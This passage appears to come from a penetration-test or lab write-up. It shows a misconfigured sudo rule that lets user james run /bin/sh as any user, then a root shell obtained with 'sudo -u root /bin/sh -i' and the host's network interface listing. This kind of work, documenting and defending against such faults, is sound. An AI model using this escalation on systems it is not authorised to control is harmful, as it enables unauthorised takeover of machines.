/bin/sh


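Reviewing the sudo privileges of the james user identified that the user is able to execute /bin/sh as ANYONE. Because /bin/sh is a shell, a sudo rule that permits it for any target user is equivalent to unrestricted root access, as the session below shows.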

james@mentor:~$ sudo -u root /bin/sh -i
# whoami
root
# hostname
mentor
# ifconfig
br-028c7a43f929: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.20.0.1  netmask 255.255.0.0  broadcast 172.20.255.255
        ether 02:42:05:24:4c:de  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
br-24ddaa1f3b47: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.19.0.1  netmask 255.255.0.0  broadcast 172.19.255.255
        ether 02:42:91:6d:19:94  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
br-3d63c18e314d: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.21.0.1  netmask 255.255.0.0  broadcast 172.21.255.255
        ether 02:42:50:81:fe:3b  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
br-7d5c72654da7: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.22.0.1  netmask 255.255.0.0  broadcast 172.22.255.255
        inet6 fe80::42:1cff:fefa:2974  prefixlen 64  scopeid 0x20<link>
        ether 02:42:1c:fa:29:74  txqueuelen 0  (Ethernet)
        RX packets 819638  bytes 68842503 (68.8 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 740725  bytes 78926999 (78.9 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
br-a8a89c3bf6ff: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.18.0.1  netmask 255.255.0.0  broadcast 172.18.255.255
        ether 02:42:39:6b:f2:5a  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
docker0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.17.0.1  netmask 255.255.0.0  broadcast 172.17.255.255
        ether 02:42:11:63:61:ef  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.193  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 dead:beef::250:56ff:feb9:d25d  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:d25d  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:d2:5d  txqueuelen 1000  (Ethernet)
        RX packets 656006  bytes 78542169 (78.5 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 731358  bytes 74752498 (74.7 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 5388  bytes 382968 (382.9 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 5388  bytes 382968 (382.9 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
veth1fbf3a9: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet6 fe80::e007:5dff:fe58:a035  prefixlen 64  scopeid 0x20<link>
        ether e2:07:5d:58:a0:35  txqueuelen 0  (Ethernet)
        RX packets 131  bytes 19145 (19.1 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 200  bytes 17321 (17.3 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
veth79ba3f3: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet6 fe80::c73:30ff:fe0d:6d10  prefixlen 64  scopeid 0x20<link>
        ether 0e:73:30:0d:6d:10  txqueuelen 0  (Ethernet)
        RX packets 399  bytes 22576 (22.5 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 426  bytes 24298 (24.2 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
vethda9f088: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet6 fe80::81f:24ff:fe8c:3447  prefixlen 64  scopeid 0x20<link>
        ether 0a:1f:24:8c:34:47  txqueuelen 0  (Ethernet)
        RX packets 819108  bytes 80275714 (80.2 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 740175  bytes 78890990 (78.8 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System Level Compromise